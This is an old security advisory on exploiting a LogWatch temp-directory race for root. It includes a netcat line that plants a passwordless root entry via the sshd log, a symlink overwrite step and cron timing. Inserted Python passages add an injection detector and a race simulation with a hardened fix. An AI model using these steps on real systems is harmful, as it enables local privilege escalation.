[EXPL] Exploiting the Race Conditions in LogWatch

From: support@securiteam.com
To: list@securiteam.com
Date: Tue,  9 Apr 2002 00:08:38 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Exploiting the Race Conditions in LogWatch
------------------------------------------------------------------------

SUMMARY

LogWatch is a customizable, pluggable log-monitoring system. It goes
through your logs for a given period and produces a report on the areas
you choose, at the level of detail you choose. It is easy to use and works
out of the package on almost all systems. A race condition in the way
LogWatch creates its temporary directory can be used by local attackers to
gain root privileges. The following explains how to exploit the
vulnerability by injecting a command through the SSH daemon (or through
the FTPd).

DETAILS

Here are some ideas about exploiting the race condition in LogWatch.

First, we need a way to smuggle a command into /var/log/secure. sshd logs
the client's protocol identification string verbatim, so this is how we
can do it:

$ nc 0 22
SSH-1.99-OpenSSH_2.9p2
'& echo hoho::0:0:>>/etc/passwd #
Protocol mismatch.

$ tail -f /var/log/secure
Apr 8 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:>>/etc/passwd #' from 127.0.0.1
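The detection side of the injection above, as an added example that is not part of the advisory: a small Python scanner that picks out sshd "Bad protocol version identification" lines whose client-supplied identification string contains shell metacharacters, which is exactly what an entry planted for later execution looks like. The sample log lines are constructed for this example (host name, PIDs, timestamps and addresses are made up) and the regular expression assumes the OpenSSH message format shown in the tail output.

```python
import re

# Constructed sample of /var/log/secure, modelled on the tail output above.
# Host name, PIDs, timestamps and source addresses are made up.
SAMPLE_LOG = """\
Apr  7 04:37:33 xxxxx sshd[23420]: Bad protocol version identification ''& echo hoho::0:0:>>/etc/passwd #' from 127.0.0.1
Apr  7 04:38:01 xxxxx sshd[23421]: Bad protocol version identification 'GET / HTTP/1.0' from 10.0.0.5
Apr  7 04:39:10 xxxxx sshd[23422]: Accepted publickey for alice from 10.0.0.7 port 51234 ssh2
Apr  7 04:40:00 xxxxx sshd[23423]: Bad protocol version identification '`id`' from 10.0.0.9
"""

# OpenSSH wraps the client's identification string in single quotes. The
# client string may itself contain quotes, so the ident group is greedy and
# anchored on the final "' from <addr>" instead of on the next quote.
BAD_IDENT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Bad protocol version identification '(?P<ident>.*)' from (?P<src>\S+)$"
)

# Characters that turn a log line into shell syntax if the log text is ever
# executed or eval'd by a script. The advisory's payload relies on ', & and #.
SHELL_META = frozenset("'\"`$&|;#<>(){}\\")


def shell_meta_in(text):
    """Sorted list of shell metacharacters present in text (empty if none)."""
    return sorted(SHELL_META.intersection(text))


def find_injected_idents(log_text):
    """Return the 'Bad protocol version identification' events whose
    client-supplied string carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = BAD_IDENT_RE.match(line)
        if m is None:
            continue                      # not a bad-ident line (e.g. a normal login)
        meta = shell_meta_in(m["ident"])
        if meta:
            hits.append({
                "ts": m["ts"], "pid": int(m["pid"]), "src": m["src"],
                "ident": m["ident"], "meta": meta,
            })
    return hits


if __name__ == "__main__":
    for hit in find_injected_idents(SAMPLE_LOG):
        print("%s pid=%d from %s meta=%s ident=%r" % (
            hit["ts"], hit["pid"], hit["src"], "".join(hit["meta"]), hit["ident"]))
```

On the constructed sample the scanner flags the advisory-style payload and the backtick probe, and ignores the harmless HTTP mis-connect and the normal login. Flagged lines are the ones worth correlating with the time of the next LogWatch run, since the payload only matters if it lands in the day applystddate is going to select.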

sshd wraps our string in single quotes; the leading ' closes that quote,
the & terminates whatever precedes it on the line, and the trailing #
comments out the rest, so if this line is ever run by a shell the echo
executes. Ok, now we have the command we want in the log, how are we going
to get it executed?

----- This is what logwatch does:

Preprocessing LogFile: secure
/bin/cat /var/log/secure 2>/dev/null | /etc/log.d/scripts/shared/applystddate >/tmp/logwatch.2318/secure
DEBUG: Inside ApplyStdDate...
DEBUG: Range: yesterday
DEBUG: Looking For: Apr 6

(If the range is "yesterday", the command string has to be put in the log
the day BEFORE LogWatch runs, otherwise applystddate filters it out.)

So, if we create a symbolic link named secure inside LogWatch's temporary
directory, pointing at the script itself:

ln -s /etc/log.d/scripts/shared/applystddate secure

the filtered log is written over applystddate, and the command in it will
be executed the next time logwatch calls applystddate (many other targets
exist, for example /root/.bashrc etc.).

We can of course use other logs than secure, for example "messages", and
smuggle in the command through the FTPd.

So, what are the problems?

[code from LogWatch]

# Predictable name: tmpdir . "logwatch." . own PID, e.g. /tmp/logwatch.2318/
$TempDir = $Config{'tmpdir'} . "logwatch." . $$ . "/";

# Clean up whatever is already sitting at that path
if ( -d $TempDir ) {
    rmdir ($TempDir);
}
if ( -e $TempDir ) {
    unlink ($TempDir);
}
#### 1
if ($Config{'debug'}>7) {
    print "\nMaking Temp Dir: " . $TempDir . "\n";
}

# Return value is never checked: if the directory exists again by now,
# mkdir fails with EEXIST and LogWatch carries on using it anyway.
mkdir ($TempDir,0700);

[code from LogWatch]

The directory name is predictable (our PID is in it) and the result of
"mkdir ($TempDir,0700);" is never checked. We need to create the directory
logwatch.PID ourselves in the window after the rmdir/unlink clean-up and
before the mkdir, i.e. around #### 1. If LogWatch's own mkdir wins, the
directory is created 0700 and we will not be able to create the symbolic
link inside it; if ours is there first, the mkdir fails silently and
LogWatch writes into a directory we own.
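The race and the symlink follow-through, reproduced in Python as an added example (it is neither LogWatch's code nor part of the advisory), next to the hardened form a maintainer would write. vulnerable_make_tempdir mirrors the Perl fragment above, with a race_hook parameter standing in for the local attacker acting at #### 1. Everything happens under a fresh scratch directory: the file applystddate in it stands in for /etc/log.d/scripts/shared/applystddate, the PID 2318 is taken from the debug output, and the injected log line is constructed. Attacker and victim are the same user here; on the real system the writer is root, which is the whole point.

```python
import os
import stat
import tempfile


def vulnerable_make_tempdir(base, pid, race_hook=None):
    """Python rendering of the LogWatch fragment above.

    The name is predictable (logwatch.<pid>), whatever sits there is removed,
    and mkdir's failure is ignored. race_hook stands in for a local attacker
    acting in the window marked '#### 1': after the clean-up, before mkdir.
    """
    tmpdir = os.path.join(base, "logwatch.%d" % pid)
    if os.path.isdir(tmpdir):
        try:
            os.rmdir(tmpdir)           # rmdir ($TempDir)
        except OSError:
            pass
    if os.path.lexists(tmpdir):
        try:
            os.unlink(tmpdir)          # unlink ($TempDir)
        except OSError:
            pass
    if race_hook is not None:
        race_hook(tmpdir)              # #### 1: attacker recreates the directory
    try:
        os.mkdir(tmpdir, 0o700)        # mkdir ($TempDir,0700): EEXIST is swallowed
    except OSError:
        pass
    return tmpdir


def attacker_plant_symlink(tmpdir, target):
    """Attacker's side of the race: own the directory, plant secure -> target."""
    os.mkdir(tmpdir, 0o777)
    os.chmod(tmpdir, 0o777)            # undo the umask so the mode really is 0777
    os.symlink(target, os.path.join(tmpdir, "secure"))


def logwatch_preprocess(tmpdir, filtered_log):
    """Stands in for: cat /var/log/secure | applystddate > $TempDir/secure."""
    with open(os.path.join(tmpdir, "secure"), "w") as f:   # open() follows the symlink
        f.write(filtered_log)


def hardened_make_tempdir(base):
    """What a fixed version does: unpredictable name, created atomically with
    mode 0700 by mkdtemp, then checked before anything is written into it."""
    tmpdir = tempfile.mkdtemp(prefix="logwatch.", dir=base)
    st = os.lstat(tmpdir)
    if (not stat.S_ISDIR(st.st_mode) or st.st_uid != os.getuid()
            or stat.S_IMODE(st.st_mode) & 0o077):
        raise RuntimeError("%s is not a private directory owned by us" % tmpdir)
    return tmpdir


def run_demo():
    """Play the race in a scratch directory.

    Returns (contents of the stand-in applystddate after the vulnerable run,
    permission bits of the directory the hardened version hands back).
    """
    base = tempfile.mkdtemp(prefix="racedemo.")
    target = os.path.join(base, "applystddate")   # stands in for /etc/log.d/scripts/shared/applystddate
    with open(target, "w") as f:
        f.write("#!/bin/sh\n# original filter script\n")

    # Constructed log line in the shape of the advisory's injected entry.
    injected = ("Apr  7 04:37:33 xxxxx sshd[23420]: Bad protocol version identification "
                "''& echo hoho::0:0:>>/etc/passwd #' from 127.0.0.1\n")

    tmpdir = vulnerable_make_tempdir(
        base, 2318, race_hook=lambda d: attacker_plant_symlink(d, target))
    logwatch_preprocess(tmpdir, injected)         # writes through the symlink
    with open(target) as f:
        clobbered = f.read()

    safe = hardened_make_tempdir(base)
    return clobbered, stat.S_IMODE(os.stat(safe).st_mode)


if __name__ == "__main__":
    clobbered, mode = run_demo()
    print("applystddate now starts with: %r" % clobbered.splitlines()[0])
    print("hardened temp dir mode: %o" % mode)
```

After the vulnerable run the stand-in applystddate no longer starts with its shebang but with the injected log line, which is the state the advisory relies on for the next invocation. The Perl equivalent of the hardened path is File::Temp's tempdir (an unpredictable name created 0700) together with checking mkdir's return value instead of ignoring it; either change alone closes the window at #### 1.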

Another nice thing is that we can see when LogWatch will be executed by
looking at /etc/crontab: logwatch lives in /etc/cron.daily, which is run
by the entry

02 4 * * * root run-parts /etc/cron.daily

so the race can be timed.

ADDITIONAL INFORMATION

The information has been provided by anonym <mailto:an0nym0uz@dbzmail.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


